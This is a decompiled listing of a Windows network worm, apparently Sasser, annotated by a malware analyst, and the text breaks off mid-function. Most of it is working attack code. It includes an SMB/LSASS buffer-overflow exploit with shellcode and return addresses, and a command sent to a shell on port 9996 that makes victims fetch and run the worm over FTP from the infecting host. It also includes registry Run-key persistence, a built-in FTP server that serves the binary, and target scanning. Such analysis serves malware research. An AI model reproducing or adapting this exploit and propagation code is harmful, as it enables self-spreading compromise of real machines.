/* This file was generated by the Hex-Rays decompiler.
   Copyright (c) 2007-2020 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

// unsigned int __usercall mw_random_number@<eax>();
int __cdecl mw_srand(int a1);
int mw_WSAStartup();
char __cdecl mw_filter_ip_addresses(char *ip_address); // idb
int __cdecl mw_get_local_IP(char *a1);
char __cdecl mw_send_shell_command(char *target_ip); // idb
unsigned int __cdecl mw_get_host_by_name_wrapper(char *ip_address); // idb
int __cdecl mw_get_target_OS(char *name, int); // idb
int __cdecl mw_exploit(char *targetIP, int targetOS); // idb
char __cdecl mw_use_correct_exploit(char *target_ip);
int __cdecl sub_401A96(char *target_ip); // idb
int __stdcall mw_process_incoming_data(LPVOID lpThreadParameter);
int __cdecl mw_get_number_from_str(char *str);
int __stdcall mw_listen(int); // weak
void __noreturn mw_main_attack_loop(); // weak
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd);
void __cdecl mw_persistence(char mw_should_copy);
// size_t __cdecl strlen(const char *Str);
// void *__cdecl memset(void *, int Val, size_t Size);
// void *__cdecl memcpy(void *, const void *Src, size_t Size);
// void __usercall _alloca_probe(unsigned int a1@<eax>, char a2);
// char *__cdecl strstr(const char *Str, const char *SubStr);
// char *__cdecl strtok(char *String, const char *Delimiter);
// char *__cdecl strcpy(char *Destination, const char *Source);
// char *__cdecl strcat(char *Destination, const char *Source);
// int __cdecl isalnum(int C);
// void __noreturn start(); weak
// void __cdecl __noreturn _amsg_exit(int a1);
// _DWORD __cdecl fast_error_exit(_DWORD); weak
// char *__cdecl strchr(const char *Str, int Val);
// int __cdecl _isctype(int C, int Type);
// int _cinit(void); weak
// void __cdecl __noreturn exit(int Code);
// void __cdecl __noreturn _exit(int Code);
// _DWORD __cdecl doexit(_DWORD, _DWORD, _DWORD); weak
// void __cdecl _initterm(_PVFV *First, _PVFV *Last);
// int _wincmdln(void); weak
// int _setenvp(void); weak
// int _setargv();
// _DWORD __cdecl parse_cmdline(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// int __crtGetEnvironmentStringsA(void); weak
// int _ioinit(void); weak
// int __cdecl _heap_init(int a1);
// int _global_unwind2();
// _DWORD __cdecl _local_unwind2(_DWORD, _DWORD); weak
// _DWORD __stdcall _NLG_Notify(_DWORD); weak
// int __cdecl _except_handler3(int a1, _DWORD *a2, int a3);
// int _FF_MSGBANNER(void); weak
// int __cdecl _NMSG_WRITE(_DWORD); weak
// _DWORD __cdecl __crtGetStringTypeA(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// int __cdecl getSystemCP(int a1);
// int __initmbctable(void); weak
// void __cdecl free(void *Block);
// void *__cdecl malloc(size_t Size);
// int __cdecl _heap_alloc(unsigned int a1);
// int __sbh_heap_init(void); weak
// _DWORD __cdecl __sbh_find_block(_DWORD); weak
// _DWORD *__cdecl __sbh_free_block(_DWORD *a1, unsigned int a2);
// _DWORD __cdecl __sbh_alloc_block(_DWORD); weak
// int __cdecl __crtMessageBoxA(int a1, int a2, int a3);
// int __cdecl _callnewh(size_t Size);
// void *__cdecl memcpy_0(void *, const void *Src, size_t Size);
int sub_404C36();
// SOCKET __stdcall accept(SOCKET s, struct sockaddr *addr, int *addrlen);
// int __stdcall recv(SOCKET s, char *buf, int len, int flags);
// u_short __stdcall htons(u_short hostshort);
// SOCKET __stdcall socket(int af, int type, int protocol);
// int __stdcall setsockopt(SOCKET s, int level, int optname, const char *optval, int optlen);
// int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen);
// int __stdcall listen(SOCKET s, int backlog);
// int __stdcall closesocket(SOCKET s);
// int __stdcall gethostname(char *name, int namelen);
// char *__stdcall inet_ntoa(struct in_addr in);
// unsigned int __stdcall inet_addr(const char *cp);
// struct hostent *__stdcall gethostbyname(const char *name);
// int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData);
// int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen);
// int __stdcall send(SOCKET s, const char *buf, int len, int flags);

//-------------------------------------------------------------------------
// Data declarations

int (__stdcall *mw_AbortSystemShutDownA)(_DWORD) = (int (__stdcall *)(_DWORD))0x83173458; // weak
LONG (__stdcall *mw_RegCreateKeyA)(HKEY, LPCSTR, PHKEY) = (LONG (__stdcall *)(HKEY, LPCSTR, PHKEY))0x83173468;
LONG (__stdcall *mw_RegSetValueExA)(HKEY, LPCSTR, DWORD, DWORD, const BYTE *, DWORD) = (LONG (__stdcall *)(HKEY, LPCSTR, DWORD, DWORD, const BYTE *, DWORD))0x83173478;
LONG (__stdcall *mw_RegCloseKey)(HKEY) = (LONG (__stdcall *)(HKEY))0x83173488;
int (__stdcall *dword_405018)(_DWORD, _DWORD) = (int (__stdcall *)(_DWORD, _DWORD))0x8326C1A0; // weak
int (__stdcall *mw_sleep)(_DWORD) = (int (__stdcall *)(_DWORD))0x8326C1B0; // weak
int (__stdcall *dword_405020)(_DWORD) = (int (__stdcall *)(_DWORD))0x8326C1C0; // weak
int (__stdcall *dword_405024)(_DWORD, _DWORD, _DWORD) = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))0x8326C1D0; // weak
int (__stdcall *dword_405028)(_DWORD, _DWORD) = (int (__stdcall *)(_DWORD, _DWORD))0x8326C1E0; // weak
int dword_40502C = -2094611984; // weak
int (__stdcall *dword_405030)(_DWORD) = (int (__stdcall *)(_DWORD))0x8326C200; // weak
DWORD (__stdcall *mw_GetModuleFileNameA)(HMODULE, LPSTR, DWORD) = (DWORD (__stdcall *)(HMODULE, LPSTR, DWORD))0x8326C210;
int (__stdcall *mw_CreateThread)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD) = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))0x8326C220; // weak
int (*mw_GetLastError)(void) = (int (*)(void))0x8326C230; // idb
int (__stdcall *mw_CreateMutexA)(_DWORD, _DWORD, _DWORD) = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))0x8326C240; // weak
int (*mw_GetTickCount)(void) = (int (*)(void))0x8326C250; // idb
BOOL (__stdcall *mw_CopyFileA)(LPCSTR, LPCSTR, BOOL) = (BOOL (__stdcall *)(LPCSTR, LPCSTR, BOOL))0x8326C260;
UINT (__stdcall *mw_GetWindowsDirectoryA)(LPSTR, UINT) = (UINT (__stdcall *)(LPSTR, UINT))0x8326C270;
int (*mw_sprintf_ptr)(_DWORD, const char *, ...) = (int (*)(_DWORD, const char *, ...))0x8326C180; // weak
char *mw_shell_command = "echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on\n"; // idb
char shellcode[1] = "ë"; // idb
int dword_4060E4[58] =
{
  1504332701,
  -207757808,
  1724567177,
  -1728878130,
  1842243274,
  1724565961,
  1225941454,
  316503322,
  -212227475,
  -1659846519,
  274889495,
  -820993585,
  -640741211,
  -1243652353,
  -569075560,
  -1429223031,
  -926365616,
  -926377741,
  -89792930,
  345636340,
  -926308898,
  -881209754,
  -899297690,
  -916074906,
  -1434595738,
  1495020889,
  -876060436,
  1265027791,
  2066923715,
  1515825783,
  1718056561,
  -302195098,
  -84481079,
  -335675944,
  -1712657668,
  -117642278,
  -339084051,
  -352519434,
  -593897238,
  -840044319,
  -117642255,
  -153773571,
  -254411272,
  -336008197,
  -291907360,
  -1429820438,
  -892429909,
  -84489512,
  -655491854,
  -135201895,
  -252339715,
  -134418966,
  -84215655,
  -1712461316,
  -352913926,
  -84481284,
  -1712456462,
  0
}; // weak
char buf[3] = { '\0', '\0', '\0' }; // idb
char byte_406258[3] = { '\0', '\0', '\0' }; // idb
char byte_406304[3] = { '\0', '\0', '\0' }; // idb
char byte_4063E4 = '\0'; // weak
wchar_t aC[3] = L"C$"; // weak
char byte_406448[3] = { '\0', '\0', '\0' }; // idb
char byte_4064B4[3] = { '\0', '\0', '\0' }; // idb
int mw_XP_overflow_part1[7] = { -200540160, 1112364031, 37, -939059200, 0, 0, 0 }; // weak
int mw_XP_overflow_part2[5] = { 4199573, 3, 4223100, 1, 0 }; // weak
int mw_w2k_overflow_header_part1[7] = { -133169152, 1112364031, 47, -939059200, 0, 0, 0 }; // weak
int mw_w2k_overflow_header_part2[7] = { -670105600, 1112364031, 37, -939059200, 0, 0, 0 }; // weak
int mw_w2k_overflow_header_part3 = 0; // weak
int mw_exploit_return_addr[] = { 16795136 }; // weak
LPCSTR off_4068C8 = "avserve.exe"; // idb
char *str_200_ok = "220 OK\n"; // idb
char *str_331_ok = "331 OK\n"; // idb
char *str_230_ok = "230 OK\n"; // idb
char *str_226_ok = "226 OK\n"; // idb
char *str_200_ok_2 = "200 OK\n"; // idb
char *str_150_ok = "150 OK\n"; // idb
char localhost_ip[10] = "127.0.0.1"; // weak
int dword_406A14[2] = { 116066027, 0 }; // weak
int dword_406A1C = 485261670; // weak
int dword_406A20 = 15007495; // weak
char version_50[4] = "5.0"; // idb
char version_51[4] = "5.1"; // idb
char aCWinLog[11] = "c:\\win.log"; // weak
char aQuit[] = "QUIT"; // idb
char aRetr[] = "RETR"; // idb
char aIIII[] = "%i.%i.%i.%i"; // idb
char aPort[] = "PORT"; // idb
char aPass[] = "PASS"; // idb
char aUser[] = "USER"; // idb
char aJobaka3l[9] = "Jobaka3l"; // weak
CHAR aSoftwareMicros[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; // idb
char asc_406AB0[] = "\\"; // idb
int dword_406F20 = 210776; // weak
int dword_406F24 = 0; // weak
char Source[4] = { '\0', '\0', '\0', '\0' }; // idb


//----- (00401000) --------------------------------------------------------
unsigned int __usercall mw_random_number@<eax>()
{
  dword_406F20 = 214013 * dword_406F20 + 2596547;
  return HIWORD(dword_406F20) & 0x7FFF;
}
// 406F20: using guessed type int dword_406F20;

//----- (0040101E) --------------------------------------------------------
int __cdecl sub_40101E(int a1)
{
  int result; // eax

  result = a1;
  dword_406F20 = a1;
  return result;
}
// 406F20: using guessed type int dword_406F20;

//----- (00401028) --------------------------------------------------------
int mw_WSAStartup()
{
  struct WSAData WSAData; // [esp+0h] [ebp-190h] BYREF

  return WSAStartup(257u, &WSAData);
}

//----- (00401045) --------------------------------------------------------
char __cdecl mw_filter_ip_addresses(char *ip_address)
{
  int v1; // ecx
  int v2; // edi
  signed int v3; // eax

  v3 = inet_addr(ip_address);
  v1 = v3 + ((v3 & 0x80u) != 0 ? 0x100 : 0);
  v2 = SBYTE1(v3) + ((v3 & 0x8000) != 0 ? 0x100 : 0);
  LOBYTE(v3) = 1;
  if ( v1 == 127 )
  {
    if ( v2 || SBYTE2(v3) + ((v3 & 0x800000) != 0 ? 0x100 : 0) )
      return v3;
    if ( SHIBYTE(v3) + (v3 < 0 ? 0x100 : 0) == 1 )
      goto LABEL_13;
  }
  if ( v1 == 10 )
    goto LABEL_13;
  if ( v1 == 172 )
  {
    if ( v2 <= 15 )
      return v3;
    if ( v2 < 32 )
    {
LABEL_13:
      LOBYTE(v3) = 0;
      return v3;
    }
  }
  if ( v1 == 192 && v2 == 168 || v1 == 169 && v2 == 254 )
    goto LABEL_13;
  return v3;
}

//----- (004010D2) --------------------------------------------------------
int __cdecl mw_get_local_IP(char *a1)
{
  struct hostent *mw_local_hostent; // eax
  struct hostent *v2; // edi
  int v3; // esi
  char **v4; // eax
  char *mw_dotted_ip_address; // ebx
  char mw_local_host_name[256]; // [esp+Ch] [ebp-100h] BYREF

  if ( !gethostname(mw_local_host_name, 255) )
  {
    mw_local_hostent = gethostbyname(mw_local_host_name);
    v2 = mw_local_hostent;
    v3 = 0;
    if ( mw_local_hostent )
    {
      v4 = mw_local_hostent->h_addr_list;
      if ( *v4 )
      {
        while ( 1 )
        {
          mw_dotted_ip_address = inet_ntoa(*v4[v3]);
          if ( mw_filter_ip_addresses(mw_dotted_ip_address) )
            return dword_405018(a1, mw_dotted_ip_address);
          v4 = v2->h_addr_list;
          if ( !v4[++v3] )
            goto LABEL_8;
        }
      }
    }
  }
  mw_dotted_ip_address = a1;
LABEL_8:
  if ( mw_dotted_ip_address )
    return dword_405018(a1, mw_dotted_ip_address);
  return dword_405018(a1, localhost_ip);
}
// 405018: using guessed type int (__stdcall *dword_405018)(_DWORD, _DWORD);

//----- (00401153) --------------------------------------------------------
char __cdecl mw_send_shell_command(char *target_ip)
{
  SOCKET v1; // ebx
  unsigned int v3; // esi
  size_t i; // esi
  char buf[556]; // [esp+4h] [ebp-340h] BYREF
  char v6[256]; // [esp+230h] [ebp-114h] BYREF
  struct sockaddr name; // [esp+330h] [ebp-14h] BYREF
  char optval[4]; // [esp+340h] [ebp-4h] BYREF
  char success; // [esp+34Fh] [ebp+Bh]

  memset(&name, 0, sizeof(name));
  name.sa_family = 2;                           // AF_INET
  *name.sa_data = htons(9996u);
  *&name.sa_data[2] = mw_get_host_by_name_wrapper(target_ip);
  memset(&name.sa_data[6], 0, 8u);
  v1 = socket(2, 1, 6);                         // AF_INET, SOCK_STREAM, IPPROTO_TCP
  if ( v1 == -1 )
    return 0;
  *optval = 5000;
  setsockopt(v1, 0xFFFF, 0x1006, optval, 4);    // SOL_SOCKET, SO_RCVTIMEO
  setsockopt(v1, 0xFFFF, 0x1005, optval, 4);    // SOL_SOCKET, SO_SNDTIMEO
  if ( connect(v1, &name, 16) == -1 )
  {
    success = 0;
  }
  else
  {
    v3 = mw_random_number();
    dword_405018(v6, Source);
    mw_get_local_IP(v6);
    mw_sprintf_ptr(buf, mw_shell_command, v6, v3, v3);
    for ( i = 0; i < strlen(buf); ++i )
      send(v1, &buf[i], 1, 0);
    mw_sleep(1000);
    success = 1;
  }
  closesocket(v1);
  return success;
}
// 405018: using guessed type int (__stdcall *dword_405018)(_DWORD, _DWORD);
// 40501C: using guessed type int (__stdcall *mw_sleep)(_DWORD);
// 4050DC: using guessed type int (*mw_sprintf)(_DWORD, const char *, ...);

//----- (0040129D) --------------------------------------------------------
unsigned int __cdecl mw_get_host_by_name_wrapper(char *ip_address)
{
  unsigned int v1; // eax
  unsigned int v2; // esi
  struct hostent *v3; // eax

  v1 = inet_addr(ip_address);
  v2 = v1;
  if ( v1 == -1 )                               // -1 == INADDR_NONE
  {
LABEL_4:
    v3 = gethostbyname(ip_address);
    if ( v3 )
      v2 = **v3->h_addr_list;
    goto LABEL_6;
  }
  if ( !v1 )
  {
    if ( *ip_address == 48 )
      return v2;
    goto LABEL_4;
  }
LABEL_6:
  if ( v2 == -1 )                               // -1 == INADDR_NONE
    v2 = 0;
  return v2;
}

//----- (004012D8) --------------------------------------------------------
int __cdecl mw_get_target_OS(char *name, int a2)
{
  int v2; // ecx
  char *v3; // eax
  size_t v4; // eax
  size_t v5; // eax
  struct hostent *v6; // esi
  SOCKET v7; // ebx
  char *v9; // esi
  int v10; // edi
  char buf[48]; // [esp+0h] [ebp-748h] BYREF
  char v12; // [esp+30h] [ebp-718h] BYREF
  char Src; // [esp+640h] [ebp-108h] BYREF
  char v14; // [esp+641h] [ebp-107h] BYREF
  char v15[120]; // [esp+690h] [ebp-B8h] BYREF
  char Str[40]; // [esp+708h] [ebp-40h] BYREF
  struct sockaddr v17; // [esp+730h] [ebp-18h] BYREF
  char optval[4]; // [esp+740h] [ebp-8h] BYREF
  char v19; // [esp+746h] [ebp-2h] BYREF
  char v20; // [esp+747h] [ebp-1h] BYREF

  dword_405018(a2, Source);
  mw_sprintf_ptr(Str, "\\\\%s\\ipc$", name);
  v2 = 0;
  v3 = &v14;
  do
  {
    *(v3 - 1) = Str[v2];
    *v3 = 0;
    ++v2;
    v3 += 2;
  }
  while ( v2 < 40 );
  memcpy(v15, byte_4063E4, 0x60u);
  v4 = strlen(Str);
  memcpy(&v15[48], &Src, 2 * v4);
  v5 = strlen(Str);
  memcpy(&v15[2 * v5 + 47], &aC[1] + 1, 9u);
  v19 = 2 * (strlen(Str) + 26);
  memcpy(&v15[3], &v19, sizeof(char));
  v20 = 2 * strlen(Str) + 9;
  memcpy(&v15[45], &v20, sizeof(char));
  v6 = gethostbyname(name);
  if ( !v6 )
    return 0;
  v7 = socket(2, 1, 0);
  if ( v7 == -1 )
    return 0;
  v17.sa_family = 2;
  *v17.sa_data = htons(445u);
  *&v17.sa_data[2] = **v6->h_addr_list;
  memset(&v17.sa_data[6], 0, 8u);
  *optval = 1000;
  setsockopt(v7, 0xFFFF, 4102, optval, 4);
  setsockopt(v7, 0xFFFF, 4101, optval, 4);
  if ( connect(v7, &v17, 16) == -1 )
    return 0;
  setsockopt(v7, 0xFFFF, 4102, optval, 4);
  setsockopt(v7, 0xFFFF, 4101, optval, 4);
  if ( send(v7, ::buf, 137, 0) == -1 )
    return 0;
  recv(v7, buf, 1600, 0);
  if ( send(v7, byte_406258, 168, 0) == -1 )
    return 0;
  recv(v7, buf, 1600, 0);
  if ( send(v7, byte_406304, 222, 0) == -1 )
    return 0;
  recv(v7, buf, 1600, 0);
  v9 = &v12;
  v10 = 70;
  do
  {
    mw_sprintf_ptr(a2, "%s%c", a2, *v9);
    v9 += 2;
    --v10;
  }
  while ( v10 );
  closesocket(v7);
  return 1;
}
// 405018: using guessed type int (__stdcall *dword_405018)(_DWORD, _DWORD);
// 4050DC: using guessed type int (*mw_possible_sprintf)(_DWORD, const char *, ...);
// 4063E4: using guessed type int dword_4063E4[7];
// 406438: using guessed type wchar_t aC[3];

//----- (0040152C) --------------------------------------------------------
int __cdecl mw_exploit(char *targetIP, int targetOS)
{
  int v2; // ecx
  char *v3; // eax
  size_t v4; // eax
  size_t v5; // eax
  int v6; // eax
  size_t v7; // eax
  size_t v8; // eax
  int *v9; // ebx
  size_t v10; // eax
  size_t v11; // eax
  int v12; // ecx
  char *v13; // eax
  SOCKET v14; // edi
  int v15; // eax
  char v17[8408]; // [esp+0h] [ebp-89C4h] BYREF
  char v18[8408]; // [esp+20D8h] [ebp-68ECh] BYREF
  char v19[7004]; // [esp+41B0h] [ebp-4814h] BYREF
  char v20[3504]; // [esp+5D0Ch] [ebp-2CB8h] BYREF
  char v21[124]; // [esp+6ABCh] [ebp-1F08h] BYREF
  char v22[2000]; // [esp+6B38h] [ebp-1E8Ch] BYREF
  char v23[1944]; // [esp+7308h] [ebp-16BCh] BYREF
  int v24[500]; // [esp+7AA0h] [ebp-F24h] BYREF
  char buf[1600]; // [esp+8270h] [ebp-754h] BYREF
  char Src; // [esp+88B0h] [ebp-114h] BYREF
  char v27; // [esp+88B1h] [ebp-113h] BYREF
  char v28[120]; // [esp+8900h] [ebp-C4h] BYREF
  char Str[40]; // [esp+8978h] [ebp-4Ch] BYREF
  struct sockaddr name; // [esp+89A0h] [ebp-24h] BYREF
  char v31[4]; // [esp+89B0h] [ebp-14h] BYREF
  int v32; // [esp+89B4h] [ebp-10h]
  int v33; // [esp+89B8h] [ebp-Ch] BYREF
  char v34; // [esp+89BEh] [ebp-6h] BYREF
  char v35; // [esp+89BFh] [ebp-5h] BYREF
  SOCKET mw_socket; // [esp+89C0h] [ebp-4h]

  *v31 = dword_406A1C;
  v32 = dword_406A20;
  mw_sprintf_ptr(Str, "\\\\%s\\ipc$", targetIP);
  v2 = 0;
  v3 = &v27;
  do                                            // Converts Str to wide string
  {
    *(v3 - 1) = Str[v2];
    *v3 = 0;
    ++v2;
    v3 += 2;
  }
  while ( v2 < 40 );
  memcpy(v28, byte_4063E4, 96u);
  v4 = strlen(Str);
  memcpy(&v28[48], &Src, 2 * v4);
  v5 = strlen(Str);
  memcpy(&v28[2 * v5 + 47], &aC[1] + 1, 9u);
  v35 = 2 * (strlen(Str) + 26);
  memcpy(&v28[3], &v35, sizeof(char));
  v34 = 2 * strlen(Str) + 9;
  memcpy(&v28[45], &v34, sizeof(char));
  LOWORD(v6) = htons(0x270Cu);
  v33 = v6 ^ 0x9999;
  memcpy(dword_4060E4, &v33, 2u);
  if ( targetOS == 1 || targetOS == 2 )
  {
    memset(v20, 0x90, 3500u);
    v9 = &mw_exploit_return_addr[15 * targetOS];
    memcpy(&v20[2020], v9, 4u);
    v10 = strlen(shellcode);
    memcpy(&v20[2036], shellcode, v10);
    memcpy(&v20[2840], dword_406A14, 4u);
    memcpy(&v20[2844], v9, 4u);
    v11 = strlen(shellcode);
    memcpy(&v20[2856], shellcode, v11);
    v12 = 0;
    v13 = &v19[1];
    do
    {
      *(v13 - 1) = v20[v12];
      *v13 = 0;
      ++v12;
      v13 += 2;
    }
    while ( v12 < 3500 );
    v19[7000] = 0;
    v19[7001] = 0;
    memset(v17, 49, 7250u);
    memset(v18, 49, 7250u);
  }
  else
  {
    memset(v24, 144, sizeof(v24));
    v7 = strlen(shellcode);
    memcpy(&v24[40], shellcode, v7);
    v8 = strlen(v31);
    memcpy(&v24[495], v31, v8);
    v24[491] = mw_exploit_return_addr[15 * targetOS];
  }
  v14 = socket(2, 1, 0);
  mw_socket = v14;
  if ( v14 != -1 )
  {
    name.sa_family = 2;
    *name.sa_data = htons(0x1BDu);
    *&name.sa_data[2] = mw_get_host_by_name_wrapper(targetIP);
    memset(&name.sa_data[6], 0, 8u);
    if ( connect(v14, &name, 16) != -1 && send(v14, ::buf, 137, 0) != -1 )// SMB Negotiate Protocol
    {
      recv(v14, buf, 1600, 0);
      if ( send(mw_socket, byte_406258, 168, 0) != -1 )// Session Setup AndX (NTLMSSP_NEGOTIATE)
      {
        recv(mw_socket, buf, 1600, 0);
        if ( send(mw_socket, byte_406304, 222, 0) != -1 )// Session Setup AndX Request (NTLMSSP_AUTH)
        {
          recv(mw_socket, buf, 1600, 0);
          if ( send(mw_socket, v28, v35 + 4, 0) != -1 )// Tree Connect AndX
          {
            recv(mw_socket, buf, 1600, 0);
            if ( send(mw_socket, byte_406448, 104, 0) != -1 )// NT Create AndX
            {
              recv(mw_socket, buf, 1600, 0);
              if ( send(mw_socket, byte_4064B4, 160, 0) != -1 )// RPC Bind
              {
                recv(mw_socket, buf, 1600, 0);
                if ( targetOS == 1 || targetOS == 2 )// W2K
                {
                  memcpy(v17, mw_w2k_overflow_header_part1, 0x68u);
                  memcpy(&v17[104], v19, 0x1B5Au);
                  memcpy(v18, mw_w2k_overflow_header_part2, 0x70u);
                  memcpy(&v18[112], &v19[4244], 0xA5Eu);
                  memcpy(&v18[2868], &mw_w2k_overflow_header_part3, 0x84u);
                  if ( send(mw_socket, v17, 4348, 0) == -1 )// DsRoleUpgradeDownlevelServer
                    return 0;
                  recv(mw_socket, buf, 1600, 0);
                  v15 = send(mw_socket, v18, 4060, 0);
                }
                else                            // XP
                {
                  memcpy(v21, mw_XP_overflow_part1, sizeof(v21));
                  memcpy(v22, v24, sizeof(v22));
                  memcpy(v23, mw_XP_overflow_part2, 0x90u);
                  v23[1195] = 0;
                  v15 = send(mw_socket, v21, 3320, 0);// DsRoleUpgradeDownlevelServer
                }
                if ( v15 != -1 )
                {
                  mw_sleep(1000);
                  closesocket(mw_socket);
                }
              }
            }
          }
        }
      }
    }
  }
  return 0;
}
// 401627: variable 'v6' is possibly undefined
// 40501C: using guessed type int (__stdcall *mw_sleep)(_DWORD);
// 4050DC: using guessed type int (*mw_possible_sprintf)(_DWORD, const char *, ...);
// 4060E4: using guessed type int dword_4060E4[58];
// 4063E4: using guessed type int dword_4063E4[7];
// 406438: using guessed type wchar_t aC[3];
// 406558: using guessed type int dword_406558[7];
// 4065D8: using guessed type int dword_4065D8[5];
// 40666C: using guessed type int dword_40666C[7];
// 4066D8: using guessed type int dword_4066D8[7];
// 40674C: using guessed type int dword_40674C;
// 406810: using guessed type int dword_406810[];
// 406A14: using guessed type int dword_406A14[2];
// 406A1C: using guessed type int dword_406A1C;
// 406A20: using guessed type int dword_406A20;

//----- (00401A12) --------------------------------------------------------
char __cdecl mw_use_correct_exploit(char *target_ip)
{
  int target_os; // eax
  char Str[132]; // [esp+4h] [ebp-84h] BYREF

  target_os = mw_get_target_OS(target_ip, Str);
  if ( target_os == 1 )
  {
    if ( strstr(Str, version_51) )              // Windows XP
    {
      mw_exploit(target_ip, 0);
      mw_exploit(target_ip, 0);
    }
    else if ( strstr(Str, version_50) )         // W2K
    {
      mw_exploit(target_ip, 1);
      mw_exploit(target_ip, 1);
    }
    else
    {
      mw_exploit(target_ip, 2);                 // fallback
      mw_exploit(target_ip, 2);
    }
    LOBYTE(target_os) = mw_send_shell_command(target_ip);
  }
  return target_os;
}

//----- (00401A96) --------------------------------------------------------
int __cdecl sub_401A96(char *target_ip)
{
  int result; // eax
  int v2; // edi
  size_t v3; // eax
  void (__stdcall *v4)(int, char *, size_t); // esi
  size_t v5; // eax
  char Str[20]; // [esp+4h] [ebp-14h] BYREF

  mw_sprintf_ptr(Str, "%i", ++dword_406F24);
  result = dword_405028(aCWinLog, 0);
  v2 = result;
  if ( result != -1 )
  {
    v3 = strlen(Str);
    v4 = dword_405024;
    dword_405024(v2, Str, v3);
    v5 = strlen(target_ip);
    v4(v2, target_ip, v5);
    result = dword_405020(v2);
  }
  return result;
}
// 405020: using guessed type int (__stdcall *dword_405020)(_DWORD);
// 405024: using guessed type int (__stdcall *dword_405024)(_DWORD, _DWORD, _DWORD);
// 405028: using guessed type int (__stdcall *dword_405028)(_DWORD, _DWORD);
// 4050DC: using guessed type int (*mw_sprintf)(_DWORD, const char *, ...);
// 406F24: using guessed type int dword_406F24;

//----- (00401B03) --------------------------------------------------------
int __stdcall mw_process_incoming_data(LPVOID lpThreadParameter)
{
  int v1; // edi
  SOCKET socket; // ebx
  int v3; // eax
  u_short v4; // di
  int v5; // eax
  char *v6; // ebx
  int i; // edi
  bool v8; // zf
  int v9; // eax
  unsigned int v10; // ebx
  SOCKET v11; // ebx
  int (__stdcall *v12)(int, char *, int); // ebx
  int j; // eax
  const char *v15; // [esp-14h] [ebp-8FCh]
  const char *v16; // [esp-14h] [ebp-8FCh]
  int len; // [esp-10h] [ebp-8F8h]
  int len2; // [esp-10h] [ebp-8F8h]
  int v19; // [esp-8h] [ebp-8F0h]
  _DWORD v20[256]; // [esp+4h] [ebp-8E4h] BYREF
  char buf[4]; // [esp+404h] [ebp-4E4h] BYREF
  char Source[1020]; // [esp+408h] [ebp-4E0h] BYREF
  char String[132]; // [esp+804h] [ebp-E4h] BYREF
  char target_ip[40]; // [esp+888h] [ebp-60h] BYREF
  int v25[4]; // [esp+8B0h] [ebp-38h]
  struct sockaddr name; // [esp+8C0h] [ebp-28h] BYREF
  int v27; // [esp+8D0h] [ebp-18h]
  int v28; // [esp+8D4h] [ebp-14h]
  int v29; // [esp+8D8h] [ebp-10h]
  SOCKET v30; // [esp+8DCh] [ebp-Ch]
  int v31; // [esp+8E0h] [ebp-8h]
  char Delimiter[2]; // [esp+8E4h] [ebp-4h] BYREF
  char Destination[2]; // [esp+8E6h] [ebp-2h] BYREF

  socket = lpThreadParameter;
  if ( lpThreadParameter != -1 )
  {
    v19 = v1;
    v3 = strlen(str_200_ok);
    send(lpThreadParameter, str_200_ok, v3, 0);
    v4 = lpThreadParameter;
    while ( 1 )
    {
      v5 = recv(socket, buf, 1024, 0);
      buf[v5] = 0;
      v29 = v5;
      if ( strstr(buf, aUser) )
      {
        len = strlen(str_331_ok);
        v15 = str_331_ok;                       // "User name okay, password needed."
      }
      else if ( strstr(buf, aPass) )
      {
        len = strlen(str_230_ok);
        v15 = str_230_ok;                       // "User logged in, proceed."
      }
      else
      {
        if ( strstr(buf, aPort) )
        {
          strcpy(String, Source);
          strcpy(Delimiter, ",");
          v6 = strtok(String, Delimiter);
          for ( i = 0; i < 6; ++i )
          {
            if ( v6 )
            {
              v8 = i == 4;
              if ( i < 4 )
              {
                v25[i] = mw_get_number_from_str(v6);
                v8 = i == 4;
              }
              if ( v8 )
                v27 = mw_get_number_from_str(v6);
              if ( i == 5 )
                v28 = mw_get_number_from_str(v6);
            }
            else
            {
              i = 6;
            }
            v6 = strtok(0, Delimiter);
          }
          v4 = v28 + (v27 << 8);
          mw_sprintf_ptr(target_ip, "%i.%i.%i.%i", v25[0], v25[1], v25[2], v25[3]);
          len2 = strlen(str_200_ok_2);
          v16 = str_200_ok_2;                   // "The requested action has been successfully completed."
LABEL_31:
          send(lpThreadParameter, v16, len2, 0);
          goto LABEL_36;
        }
        if ( strstr(buf, aRetr) )
        {
          v9 = strlen(str_150_ok);
          send(socket, str_150_ok, v9, 0);      // "File status okay; about to open data connection."
          v10 = mw_get_host_by_name_wrapper(target_ip);
          if ( v10 )
          {
            memset(&name, 0, sizeof(name));
            name.sa_family = 2;
            *name.sa_data = htons(v4);
            *&name.sa_data[2] = v10;
            v11 = ::socket(2, 1, 0);
            v30 = v11;
            if ( v11 != -1 )
            {
              if ( connect(v11, &name, 16) == -1 )
              {
                closesocket(v11);
              }
              else
              {
                mw_GetModuleFileNameA(0, v20, 1024, v19);
                v19 = 0;
                v31 = dword_405030(v20);
                if ( v31 != -1 )
                {
                  strcpy(Destination, ::Source);
                  v12 = dword_40502C;
                  for ( j = (dword_40502C)(v31, Destination, 1); j == 1; j = v12(v31, Destination, 1) )
                  {
                    Destination[1] = 0;
                    send(v30, Destination, 1, 0);
                  }
                  dword_405020(v31);
                  sub_401A96(target_ip);
                }
              }
            }
          }
          closesocket(v30);
          len2 = strlen(str_226_ok);
          v16 = str_226_ok;
          goto LABEL_31;
        }
        if ( strstr(buf, aQuit) )
        {
          closesocket(socket);
          goto LABEL_36;
        }
        len = strlen(str_226_ok);
        v15 = str_226_ok;
      }
      send(socket, v15, len, 0);
LABEL_36:
